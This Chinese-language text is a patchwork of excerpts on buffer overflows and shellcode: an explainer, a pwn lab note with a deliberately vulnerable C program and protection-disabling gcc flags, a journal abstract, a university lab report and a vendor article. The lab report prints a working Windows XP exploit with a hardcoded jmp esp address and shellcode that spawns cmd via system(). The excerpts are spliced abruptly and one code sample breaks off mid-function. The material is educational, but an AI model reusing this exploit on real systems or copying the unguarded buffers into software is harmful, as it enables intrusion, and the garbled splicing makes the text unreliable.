Shellcode是一种可以被注入到程序中执行的二进制代码，通常用于攻击者构造缓冲区溢出攻击。

Shellcode通常是针对某特定平台的二进制代码，其目的就是让攻击者能够在受害机器上获取更高的系统权限，比如管理员权限。

下面我们来看一个简单的缓冲区溢出攻击实例：首先，我们有一个简单的C程序，名为vuln.c，其代码如下：```#include <stdio.h>void secret_function(){printf("Congratulations! You have executed the secret function!\n");}void vulnerable_function(){char buffer[200];printf("Enter some text:\n");scanf("%s", buffer);该程序定义了两个函数：vulnerable_function和secret_function。

其中，vulnerable_function存在缓冲区溢出漏洞，攻击者可以通过输入过长的字符串，覆盖程序栈上的返回地址，从而控制程序执行流程，使其跳转到secret_function函数中。

pwn⼊门实验1：缓冲区溢出（return2shellcode和jmpesp）实验的缓冲区溢出源码：// 1.c#include<stdio.h>void func(){char name[0x50];//0x100⼤⼩的栈空间read(0, name, 0x100);//输⼊0x200⼤⼩的数据write(1, name, 0x100);}int main(){func();return0;}x86下⽆任何防护机制编译：gcc -m32 1.c -o 1 -O0 -fno-stack-protector -z execstack -z norelro -no-piem32:⽣成32bit程序需要gcc-multilib(x86机器上编译不⽤加)O0:不进⾏任何优化fno-stack-protector:不开启canary栈溢出检测z execstack:开启栈可执⾏关闭NX-no-pie：不开启pie保护NX：-z execstack / -z noexecstack (关闭 / 开启) 栈不可执⾏，使插⼊的JMP ESP⽆效Canary：-fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) canary栈溢出检测：在函数每⼀次执⾏时，在栈上随机产⽣⼀个Canary值（cookie），往往放置在ebp/rbp的正上⽅。

之后当函数执⾏结束返回时检测Canary值，若不⼀致停⽌程序运⾏ASLR的是操作系统的功能选项，作⽤于executable（ELF）装⼊内存运⾏时，因⽽只能随机化stack、heap、libraries的基址；PIE：-no-pie / -pie (关闭 / 开启) ，PIE是作⽤于excutable编译过程的，可将其理解为特殊的PIC（so专⽤，Position Independent Code），加了PIE选项编译出来的ELF⽤file命令查看会显⽰其为so，其随机化了ELF装载内存的基址（代码段、plt、got、data 等共同的基址）。

基于shellcode分析缓冲区溢出攻击缓冲区溢出攻击是一种常见的Cyber安全攻击方式，该攻击利用软件程序中存在的漏洞，将恶意数据注入到可执行程序的内存中，从而达到控制计算机系统的目的。

而Shellcode是一种经过编译的二进制代码，该代码可以直接被操作系统执行。

在缓冲区溢出攻击中，攻击者通过一系列的技巧，将Shellcode注入到目标系统的内存中，并利用这些代码实现对系统的控制。

首先，让我们来了解一下缓冲区溢出攻击的原理。

程序通常会在内存中分配一段连续的缓冲区来存储输入数据，但是当输入数据超出了缓冲区的边界时，程序就会发生缓冲区溢出，被攻击者利用此漏洞，通过传递恶意数据，可以将恶意数据写入程序的内存空间，覆盖原本的代码，从而实现控制目标系统的目的。

现在让我们看看攻击者是如何利用Shellcode进行缓冲区溢出攻击的。

攻击者通常会编写一段Shellcode代码，该代码可以执行特定操作，例如打开一个网络连接，下载文件，运行特定的操作系统指令等。

攻击者利用缓冲区溢出漏洞，将Shellcode注入到程序的内存空间，然后修改程序流的控制，使其指向Shellcode的起始地址，从而执行Shellcode代码。

除了将Shellcode注入到程序的内存中外，攻击者还需要使用一些技术手段，以确保Shellcode能够按照期望执行。

例如，攻击者需要确定Shellcode在内存中的地址，并构造正确的机器指令来执行Shellcode。

此外，攻击者还需要考虑绕过操作系统的一些安全措施，例如数据随机化、堆栈保护、地址空间布局随机化等。

为了防范缓冲区溢出攻击，开发人员可以采用以下一些措施：1. 输入数据长度检查：开发人员应该在程序中添加输入数据长度检查的代码，以确保输入数据不会超过缓冲区的大小。

2. 堆栈保护：操作系统可以提供堆栈保护机制，防止攻击者利用缓冲区溢出漏洞覆盖保存在堆栈中的数据。

3. 内存地址随机化：操作系统可以随机化内存地址布局，提高攻击者的难度。

缓冲区溢出攻击原理及ShellCode的构造作者：张华来源：《电脑知识与技术》2017年第06期摘要：缓冲区溢出是一种常见的网络安全漏洞，可以对计算机操作系统，应用软件造成巨大的威胁。

通过缓冲区溢出攻击，网络黑客可以远程执行恶意代码，甚至获得主机的控制权，从而开始各种非法操作。

该文分析了缓冲区溢出漏洞的产生原因及其原理，结合具体代码介绍了ShellCode的构造方法。

关键词：缓冲区溢出；网络安全；漏洞；ShellCode中图分类号：TP393 文献标识码：A 文章编号：1009-3044（2017）06-0085-02Abstract： Buffer overflow is a common network security vulnerability， which can pose a great threat to computer operating system and application software. Through buffer overflow attacks，network hackers can execute malicious code remotely ， or even get the control of the host to carry out a variety of illegal operations. This paper analyzes the causes and principles of buffer overflow vulnerability， introduces the construction method of ShellCode with the specific code.Key words： buffer overflow； network security； vulnerability； ShellCode1 概述缓冲区溢出攻击并非一种新的攻击手段。

shellcode 执行方式
Shellcode是一段二进制代码，通常用于利用漏洞或攻击目标系统。

Shellcode的执行方式有多种，下面将介绍其中几种常见的执行方式。

1. 缓冲区溢出
缓冲区溢出是一种常见的攻击方式，攻击者通过向程序输入超出缓冲
区大小的数据，覆盖程序的返回地址，使程序跳转到攻击者精心构造
的Shellcode上，从而实现攻击目的。

2. DLL注入
DLL注入是一种将Shellcode注入到目标进程中执行的方式。

攻击者
通过创建一个新的进程或者利用已有的进程，将Shellcode注入到目
标进程的地址空间中，并通过修改目标进程的线程上下文，使其执行Shellcode。

3. 文件格式漏洞
文件格式漏洞是指攻击者通过构造恶意文件，利用文件解析器的漏洞，将Shellcode注入到目标系统中。

例如，攻击者可以构造一个恶意的
PDF文件，利用PDF解析器的漏洞，将Shellcode注入到目标系统中。

4. 网络攻击
网络攻击是指攻击者通过网络传输Shellcode到目标系统中执行。

例如，攻击者可以通过网络传输一个恶意的脚本文件，利用目标系统上
的解释器执行Shellcode。

总之，Shellcode的执行方式有多种，攻击者可以根据目标系统的漏
洞和特点，选择最适合的执行方式。

为了防止Shellcode攻击，系统
管理员可以采取一些措施，如加强系统安全性、更新系统补丁、使用
防病毒软件等。

华中科技大学计算机学院《信息系统应用安全》实验报告实验名称缓冲区溢出实验团队成员：注：团队成员贡献百分比之和为1教师评语：一.实验环境⏹操作系统：Windows XP SP3⏹编译平台：Visual C++ 6.0⏹调试环境：OllyDbg二.实验目的1.掌握缓冲区溢出的原理；2.掌握缓冲区溢出漏洞的利用技巧；3.理解缓冲区溢出漏洞的防措施。

三.实验容及步骤1.缓冲区溢出漏洞产生的的基本原理和攻击方法⏹缓冲区溢出模拟程序由于拷贝字符串时产生缓冲区溢出，用“ABCD”字符串的值覆盖了原来EIP的值，所以main函数返回时EIP指向44434241，引发访问异常。

运行命令窗口的shellcode#include "string.h"#include "stdio.h"#include<windows.h>char name[]="\x41\x41\x41\x41""\x41\x41\x41\x41""\x41\x41\x41\x41" ///覆盖ebp"\x12\x45\xfa\x7f" ////覆盖eip， jmp esp地址7ffa4512"\x55\x8b\xec\x33\xc0\x50\x50\x50\xc6\x45\xf4\x6d""\xc6\x45\xf5\x73\xc6\x45\xf6\x76\xc6\x45\xf7\x63""\xc6\x45\xf8\x72\xc6\x45\xf9\x74\xc6\x45\xfa\x2e""\xc6\x45\xfb\x64\xc6\x45\xfc\x6c\xc6\x45\xfd\x6c""\x8d\x45\xf4\x50\xb8""\x77\x1d\x80\x7c" // LoadLibraryW的地址"\xff\xd0""\x55\x8b\xec\x33\xff\x57\x57\x57\xc6\x45\xf4\x73""\xc6\x45\xf5\x74\xc6\x45\xf6\x61\xc6\x45\xf7\x72""\xc6\x45\xf8\x74\xc6\x45\xf9\x20\xc6\x45\xfa\x63""\xc6\x45\xfb\x6d\xc6\x45\xfc\x64\x8d\x7d\xf4\x57""\xba""\xc7\x93\xbf\x77" // System 的地址"\xff\xd2";int main(){char output[8];strcpy(output, name);for(int i=0;i<8&&output[i];i++){printf("\\0x%x",output[i]);}printf("\n");return 0;}由于把main函数的返回EIP地址替换成了jmp esp的地址，main函数返回的时候就会执行我们的shellcode代码。

数据库缓冲区溢出漏洞原理（栈）安华金和思成一. 背景在数据库系统中已经发现了许多安全漏洞，其中比较严重且危害性比较大的有：缓冲区溢出和SQL注入2种。

SQL注入主要依赖于结构化查询语言，每种数据库略有出入；SQL注入漏洞的利用，最主要的威胁是提权；后台维护人员或黑客攻击，可以借此获得DBA权限。

需要说明的是，这里所说的SQL注入并不是应用系统的SQL注入，而是数据库自身的注入漏洞，这种漏洞比应用系统的注入漏洞危险性更高；对于SQL注入漏洞的存在，主要是由于数据库中提供的系统或用户函数存在的参数检查不严和语句执行的缺陷。

SQL注入漏洞不是本文的探讨重点，将在安华金和数据库安全实验室发表的其它文章中进行探讨。

而对于缓冲区溢出的漏洞，风险性更高，因为通过缓冲区溢出漏洞不仅可以危害数据库，还可以控制操作系统，从而以数据库服务器为跳板，控制整个内网系统。

缓冲区溢出的漏洞，不仅在数据库系统中有，在操作系统上运行的相关应用软件也有，但对于数据库由于要提供大量外部访问，防火墙、IPS等传统不能对其进行禁止，这些攻击隐藏在数据库的通讯协议中，具有更大的隐蔽性，更是难以防范。

缓冲区溢出的攻击实现不仅需要注入点（注入点，是数据库的漏洞提供的），同时还要依赖于操作系统的程序调用机制来实现；现在的操作系统对此，都在逐步加强防守，但攻击者总是能够找出方法进行突破，这种突破主要依赖于shellcode的编写。

缓冲区溢出本质上是因为操作系统无法区分数据和指令的区别，把数据当指令来执行，从而产生了无法预计的结果。

安华金和数据库安全实验室将在本文将以windows XP为依托，借助代码对如何利用缓冲区溢出做原理性介绍，以便于我们未来对其防范原理进行更好的讨论。

二. 缓冲区溢出缓冲区溢简单说，是大的数据存入了小缓冲区，又不对存入数据进行边界判断，最终导致小缓冲区被撑爆。

大的数据污染了小缓冲区附近的内存。

污染的内存可能带来改变程序控制流、夺取操作系统、禁止访问等多种结果。